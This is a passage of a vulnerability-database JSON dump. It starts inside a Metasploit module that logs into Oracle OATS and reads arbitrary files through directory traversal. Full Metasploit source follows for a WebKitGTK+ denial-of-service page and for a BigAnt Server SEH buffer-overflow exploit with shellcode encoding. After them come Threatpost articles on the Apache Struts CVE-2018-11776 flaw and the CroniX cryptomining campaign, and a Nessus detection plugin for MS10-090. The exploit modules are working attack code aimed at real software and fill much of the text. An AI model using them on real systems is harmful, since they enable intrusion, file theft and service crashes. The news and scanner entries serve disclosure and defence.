end\n\n def load_runloopback_args(res)\n html = res.get_html_document\n rk = RKelly::Parser.new\n script = html.at('script').text\n ast = rk.parse(script)\n runloopback = ast.grep(RKelly::Nodes::ExpressionStatementNode).last\n runloopback_args = runloopback.value.arguments.value\n auth_spec.loop_value = runloopback_args[2].value.scan(/'(.+)'/).flatten.first\n auth_spec.afr_window_id = runloopback_args[7].value.scan(/'(.+)'/).flatten.first\n\n json_args = runloopback_args[17]\n auth_spec.adf_window_id = json_args.value[4].value.value.to_s\n auth_spec.adf_page_id = json_args.value[5].value.value.to_s\n end\n\n def load_view_redirect_value(res)\n html = res.get_html_document\n rk = RKelly::Parser.new\n script = html.at('script').text\n ast = rk.parse(script)\n runredirect = ast.grep(RKelly::Nodes::ExpressionStatementNode).last\n runredirect_args = runredirect.value.arguments.value\n redirect_arg = runredirect_args[1].value.scan(/'(.+)'/).flatten.first || ''\n auth_spec.view_direct = redirect_arg.scan(/ORA_ADF_VIEW_REDIRECT=(\\d+);/).flatten.first\n auth_spec.adf_page_id = redirect_arg.scan(/ORA_ADF_VIEW_PAGE_ID=(s\\d+);/).flatten.first\n end\n\n def collect_initial_spec\n uri = normalize_uri(target_uri.path, 'olt', 'faces', 'login')\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri,\n })\n\n fail_with(Failure::Unknown, 'No response from server') unless res\n cookies = res.get_cookies\n session_id = cookies.scan(/JSESSIONID=(.+);/i).flatten.first || ''\n auth_spec.session_id = session_id\n load_runloopback_args(res)\n end\n\n def prepare_auth_spec\n collect_initial_spec\n uri = normalize_uri(target_uri.path, 'olt', 'faces', 'login')\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri,\n 'cookie' => \"JSESSIONID=#{auth_spec.session_id}\",\n 'vars_get' =>\n {\n '_afrLoop' => auth_spec.loop_value,\n '_afrWindowMode' => '0',\n 'Adf-Window-Id' => auth_spec.adf_window_id\n },\n 'headers' =>\n {\n 'Upgrade-Insecure-Requests' => '1'\n }\n })\n\n fail_with(Failure::Unknown, 'No response from server') unless res\n hidden_inputs = res.get_hidden_inputs.first\n auth_spec.form_value = hidden_inputs['org.apache.myfaces.trinidad.faces.FORM']\n auth_spec.view_state = hidden_inputs['javax.faces.ViewState']\n end\n\n def ota_login!\n prepare_auth_spec\n uri = normalize_uri(target_uri.path, 'olt', 'faces', 'login')\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => \"JSESSIONID=#{auth_spec.session_id}\",\n 'headers' =>\n {\n 'Upgrade-Insecure-Requests' => '1'\n },\n 'vars_post' =>\n {\n 'userName' => datastore['OATSUSERNAME'],\n 'password' => datastore['OATSPASSWORD'],\n 'org.apache.myfaces.trinidad.faces.FORM' => auth_spec.form_value,\n 'Adf-Window-Id' => auth_spec.adf_window_id,\n 'javax.faces.ViewState' => auth_spec.view_state,\n 'Adf-Page-Id' => auth_spec.adf_page_id,\n 'event' => 'btnSubmit',\n 'event.btnSubmit' => '<m xmlns=\"http://oracle.com/richClient/comm\"><k v=\"type\"><s>action</s></k></m>'\n }\n })\n\n fail_with(Failure::Unknown, 'No response from server') unless res\n if res.body.include?('Login failed')\n fail_with(Failure::NoAccess, 'Login failed')\n else\n store_valid_credential(user: datastore['OATSUSERNAME'], private: datastore['OATSPASSWORD'])\n load_view_redirect_value(res)\n end\n end\n\n def load_file\n uri = normalize_uri(target_uri.path, 'olt', 'download')\n dots = '..\\\\' * datastore['DEPTH']\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => uri,\n 'cookie' => \"JSESSIONID=#{auth_spec.session_id}\",\n 'vars_get' =>\n {\n 'type' => 'template',\n 'session' => DEFAULT_SESSION,\n 'name' => \"#{dots}#{datastore['FILE']}\"\n },\n 'headers' =>\n {\n 'Upgrade-Insecure-Requests' => '1'\n }\n })\n\n fail_with(Failure::Unknown, 'No response from server') unless res\n fail_with(Failure::Unknown, 'File not found') if res.body.include?('No content to display')\n res.body\n end\n\n def run\n ota_login!\n file = load_file\n print_line(file)\n store_loot('oats.file', 'application/octet-stream', rhost, file)\n end\n\nend\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/oats_downloadservlet_traversal.rb"}, {"lastseen": "2019-12-02T22:37:08", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset. If successful, it could lead to application crash, resulting in denial of service.\n", "modified": "2018-06-14T05:55:00", "published": "2018-06-09T06:13:47", "id": "MSF:AUXILIARY/DOS/HTTP/WEBKITPLUS", "href": "", "type": "metasploit", "title": "WebKitGTK+ WebKitFaviconDatabase DoS", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => \"WebKitGTK+ WebKitFaviconDatabase DoS\",\n 'Description' => %q(\n This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.\n If successful, it could lead to application crash, resulting in denial of service.\n ),\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Dhiraj Mishra', # Original discovery, disclosure\n 'Hardik Mehta', # Original discovery, disclosure\n 'Zubin Devnani', # Original discovery, disclosure\n 'Manuel Caballero' #JS Code\n ],\n 'References' => [\n ['EDB', '44842'],\n ['CVE', '2018-11646'],\n ['URL', 'https://bugs.webkit.org/show_bug.cgi?id=186164'],\n ['URL', 'https://datarift.blogspot.com/2018/06/cve-2018-11646-webkit.html']\n ],\n 'DisclosureDate' => 'Jun 03 2018',\n 'Actions' => [[ 'WebServer' ]],\n 'PassiveActions' => [ 'WebServer' ],\n 'DefaultAction' => 'WebServer'\n )\n )\n end\n\n def run\n exploit # start http server\n end\n\n def setup\n @html = <<-JS\n<script type=\"text/javascript\">\n win = window.open(\"WIN\", \"WIN\");\n window.open(\"http://example.com/\", \"WIN\");\n win.document.execCommand('stop');\n win.document.write(\"HelloWorld\");\n win.document.close();\n</script>\n JS\n end\n\n def on_request_uri(cli, _request)\n print_status('Sending response')\n send_response(cli, @html)\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/http/webkitplus.rb"}, {"lastseen": "2019-11-29T11:12:35", "bulletinFamily": "exploit", "description": "This exploits a stack buffer overflow in the BigAnt Messaging Service, part of the BigAnt Server product suite. This module was tested successfully against version 2.52. NOTE: The AntServer service does not restart, you only get one shot.\n", "modified": "2018-07-12T22:34:52", "published": "2010-01-05T08:24:35", "id": "MSF:EXPLOIT/WINDOWS/MISC/BIGANT_SERVER_USV", "href": "", "type": "metasploit", "title": "BigAnt Server 2.52 USV Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BigAnt Server 2.52 USV Buffer Overflow',\n 'Description' => %q{\n This exploits a stack buffer overflow in the BigAnt Messaging Service,\n part of the BigAnt Server product suite. This module was tested\n successfully against version 2.52.\n\n NOTE: The AntServer service does not restart, you only get one shot.\n },\n 'Author' \t =>\n [\n 'Lincoln',\n 'DouBle_Zer0',\n 'jduck'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-4660' ],\n [ 'OSVDB', '61386' ],\n [ 'EDB', '10765' ],\n [ 'EDB', '10973' ]\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n },\n 'Payload' =>\n {\n 'Space' => (218+709+35),\n 'BadChars' => \"\\x2a\\x20\\x27\\x0a\\x0f\",\n # pre-xor with 0x2a:\n #'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x25\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'BigAnt 2.52 Universal', { 'Ret' => 0x1b019fd6 } ], # Tested OK (jduck) p/p/r msjet40.dll xpsp3\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Dec 29 2009'))\n\n register_options([Opt::RPORT(6660)])\n end\n\n def exploit\n connect\n\n sploit = \"\"\n sploit << payload.encoded\n sploit << generate_seh_record(target.ret)\n sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + payload_space.to_s).encode_string\n sploit << rand_text_alphanumeric(3)\n sploit << [0xdeadbeef].pack('V') * 3\n\n # the buffer gets xor'd with 0x2a !\n sploit = sploit.unpack(\"C*\").map{|c| c ^ 0x2a}.pack(\"C*\")\n\n print_status(\"Trying target #{target.name}...\")\n sock.put(\"USV \" + sploit + \"\\r\\n\\r\\n\")\n\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/bigant_server_usv.rb"}], "threatpost": [{"lastseen": "2019-07-03T05:58:59", "bulletinFamily": "info", "description": "It was only a matter of time before attacks were seen in the wild, and now it\u2019s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. It uses a new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and Xhide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on Github2 and Twitter just days after the latest flaw was publicized. Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw the malware downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted off the system.\n\nCroniX also a competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.\n\n\u201cFor some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources,\u201d F5 researchers said. \u201cThis is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system.\u201d\n\nComparing the modus operandi of the operation, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). That campaign was uncovered two months ago.\n\n\u201cThe malware deployment pattern\u2026similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one,\u201d researchers noted in the analysis.\n\nOne difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files. Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names designating the Pacific island of Palau (.pw) \u2013 believed registered by a Russian registrant.\n\nWhile cryptomining can be seen as less destructive than [wiper malware,](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>) [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.\n\n\u201cApache Struts is used by some of the world\u2019s largest companies,\u201d she said via email. \u201cThe more common the vulnerability, the more it helps attackers simplify their process\u2026and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all companies implement the patch immediately. There\u2019s no time to waste.\u201d\n\nMore attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft\u2019s OS.\n\n\u201c[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a Powershell command on a targeted victim,\u201d researchers said. \u201cSo, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server.\u201d\n", "modified": "2018-09-05T17:48:03", "published": "2018-09-05T17:48:03", "id": "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "href": "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "type": "threatpost", "title": "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-28T05:48:46", "bulletinFamily": "info", "description": "A critical remote code-execution vulnerability in Apache Struts 2, the popular open-source framework for developing web applications in the Java programming language, is threatening a wide range of applications, even when no additional plugins have been enabled. Successful exploitation could lead to full endpoint and eventually network compromise, according to researchers \u2013 who said that the flaw is more dangerous than the similar vulnerability used to compromise Equifax last year.\n\nA [working exploit](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) surfaced within a day of its disclosure.\n\nThe vulnerability ([CVE-2018-11776](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776>)) was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) by the Apache Software Foundation yesterday and affects all supported versions of Struts 2: Users of Struts 2.3 should upgrade to 2.3.35; users of Struts 2.5 need to upgrade to 2.5.17. They should do so as soon as possible, given that bad actors are likely already working on exploits, according to the Semmle research team\u2019s Man Yue Mo, who uncovered the flaw.\n\n\u201cThis vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,\u201d he said in a [posting](<https://semmle.com/news/apache-struts-CVE-2018-11776>) on Wednesday. \u201cOn top of that, the weakness is related to the Struts Object-Graph Navigation Language (OGNL) language, which hackers are very familiar with, and are known to have been exploited in the past.\u201d\n\n[OGNL](<https://commons.apache.org/proper/commons-ognl/>) is a powerful, domain-specific language that is used to customize Struts\u2019 behavior.\n\n\u201cOn the whole, this is more critical than the highly critical Struts RCE vulnerability that the Semmle Security Research Team discovered and announced last September,\u201d said Yue Mo, referring to the infamous vulns (CVE-2017-9805) that hackers used to compromise Equifax last year, which led to the lifting of [personal details of 147 million consumers](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>).\n\nTim Mackey, technology evangelist at Synopsys, told Threatpost that this is due to the fact that it affects a wider swath of the Struts architecture.\n\n\u201cIn the case of CVE-2018-11776, the root cause [is] a lack of input validation on the URL passed to the Struts framework,\u201d he explained. \u201cThe prior [Struts] vulnerabilities were all in code within a single functional area of the Struts code. This meant that developers familiar with that functional area could quickly identify and resolve issues without introducing new functional behaviors. CVE-2018-11776 operates at a far deeper level within the code, which in turns requires a deeper understanding of not only the Struts code itself, but the various libraries used by Struts. It is this level of understanding which is of greatest concern \u2013 and this concern relates to any library framework.\u201d\n\n## Anatomy of the Flaw\n\nThe vulnerability is caused by insufficient validation of untrusted user data in the core of the Struts framework, according to the team\u2019s findings.\n\n\u201cAttackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request,\u201d they explained. \u201cThe value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string.\u201d\n\nBecause the issue affects the core of Struts, there are at least two separate attack vectors \u2013 and potentially many more.\n\nIn the first attack scenario, three Struts result types are unsafe when used without a namespace, as defined in either in the Struts configuration file or in Java code if the Struts Convention plugin is used. These are the redirect action, which redirects the visitor to a different URL; action chaining, which is a method to chain multiple actions into a defined sequence or workflow; and postback result, which renders the current request parameters as a form which immediately submits a postback to the specified destination chain or postback.\n\nThe researchers explained: \u201cAn example of a struts.xml configuration that is potentially vulnerable: the <action \u2026> tag does not have a namespace attribute and contains a result of type redirectAction. If you use the Struts Convention plugin, you will also have to look for actions and results that are configured using Java code.\u201d\n\nThe second attack vector has to do with the fact that Struts supports page templates inside <result> tags in the Struts configuration: \u201cThe use of URL tags in such pages is potentially unsafe if the template is referred to from an <action> tag that does not provide a namespace attribute (or specifies a wildcard namespace),\u201d the researchers said. \u201cYour application is vulnerable if the template contains an <s:url \u2026> tag without an action or value attribute.\u201d\n\nResearchers noted that for an exploit for either of the known vectors to be successful, an application must have the alwaysSelectFullNamespace flag set to \u201ctrue\u201d in the Struts configuration \u2013 a default state if the application uses the popular Struts Convention plugin. Also, the application\u2019s actions must be configured without specifying a namespace, or with a wildcard namespace (e.g. \u201c/*\u201d).\n\n\u201cThis applies to actions and namespaces specified in the Struts configuration file (e.g. <action namespace=\u201dmain\u201d>), but also to actions and namespaces specified in Java code if you are using the Struts Convention plugin,\u201d they explained.\n\nThat said, they also cautioned that other attack vectors may emerge that apply to different configurations.\n\n\u201cWhether or not a Struts application is vulnerable to remote code execution largely depends on the exact configuration and architecture of the application,\u201d the firm said. \u201cNote that even if an application is currently not vulnerable, an inadvertent change to a Struts configuration file may render the application vulnerable in the future. You are therefore strongly advised to upgrade your Struts components, even if you believe your configuration not to be vulnerable right now.\u201d\n\nThis is a critical point, according to Mackey. \u201cValidating the input to a function requires a clear definition of what is acceptable,\u201d he said. \u201cIt equally requires that any functions available for public use document how they use the data passed to them. Absent the contract such definitions and documentation form, it\u2019s difficult to determine if the code is operating correctly or not. This contract becomes critical when patches to libraries are issued as its unrealistic to assume that all patches are free from behavioral changes. Modern software is increasingly complex and identifying how data passes through it should be a priority for all software development teams.\u201d\n\nPavel Avgustinov, vice president of QL Engineering at Semmle, laid out what\u2019s at stake in a media statement: \u201cCritical remote code-execution vulnerabilities like the [one that affected Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) and the one we announced [this week] are incredibly dangerous for several reasons: Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\u201d he said. \u201cA hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system. It\u2019s crucially important to update affected systems immediately; to wait is to take an irresponsible risk.\u201d\n", "modified": "2018-08-23T16:46:57", "published": "2018-08-23T16:46:57", "id": "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "href": "https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/", "type": "threatpost", "title": "Apache Struts 2 Flaw Uncovered: \u2018More Critical Than Equifax Bug\u2019", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-11-03T12:15:45", "bulletinFamily": "scanner", "description": "The remote host is missing Internet Explorer (IE) Security Update\n2416400.\n\nThe remote version of IE is affected by several vulnerabilities that\nmay allow an attacker to execute arbitrary code on the remote host.", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS10-090.NASL", "href": "https://www.tenable.com/plugins/nessus/51162", "published": "2010-12-15T00:00:00", "title": "MS10-090: Cumulative Security Update for Internet Explorer (2416400)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(51162);\n script_version(\"1.29\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\n \"CVE-2010-3340\",\n \"CVE-2010-3342\",\n \"CVE-2010-3343\",\n \"CVE-2010-3345\",\n \"CVE-2010-3346\",\n \"CVE-2010-3348\",\n \"CVE-2010-3962\"\n );\n script_bugtraq_id(\n 44536,\n 45255,\n 45256,\n 45259,\n 45260,\n 45261,\n 45263\n );\n script_xref(name:\"CERT\", value:\"899748\");\n script_xref(name:\"EDB-ID\", value:\"15421\");\n script_xref(name:\"EDB-ID\", value:\"15418\");\n script_xref(name:\"MSFT\", value:\"MS10-090\");\n script_xref(name:\"MSKB\", value:\"2416400\");\n\n script_name(english:\"MS10-090: Cumulative Security Update for Internet Explorer (2416400)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"Arbitrary code can be executed on the remote host through a web\nbrowser.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2416400.\n\nThe remote version of IE is affected by several vulnerabilities that\nmay allow an attacker to execute arbitrary code on the remote host.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-090\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\nand 2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-13-157\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS10-090 Microsoft Internet Explorer CSS SetUserClip Memory Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS10-090';\nkbs = make_list(\"2416400\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'1,2', win7:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nkb = \"2416400\";\nif (\n # Windows 7 and Windows Server 2008 R2\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", file:\"Mshtml.dll\", version:\"8.0.7600.20831\", min_version:\"8.0.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", file:\"Mshtml.dll\", version:\"8.0.7600.16700\", min_version:\"8.0.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / Windows 2008\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", file:\"Mshtml.dll\", version:\"8.0.6001.23091\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", file:\"Mshtml.dll\", version:\"8.0.6001.18999\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.22511\", min_version:\"7.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.18332\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Mshtml.dll\", version:\"7.0.6001.22784\", min_version:\"7.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Mshtml.dll\", version:\"7.0.6001.18542\", min_version:\"7.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.18999\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.17093\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.4795\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.18999\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.17093\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"6.0.2900.6049\", min_version:\"6.0.2900.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n )\n{\n set_kb_item(name:\"SMB/Missing/MS10-090\", value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}
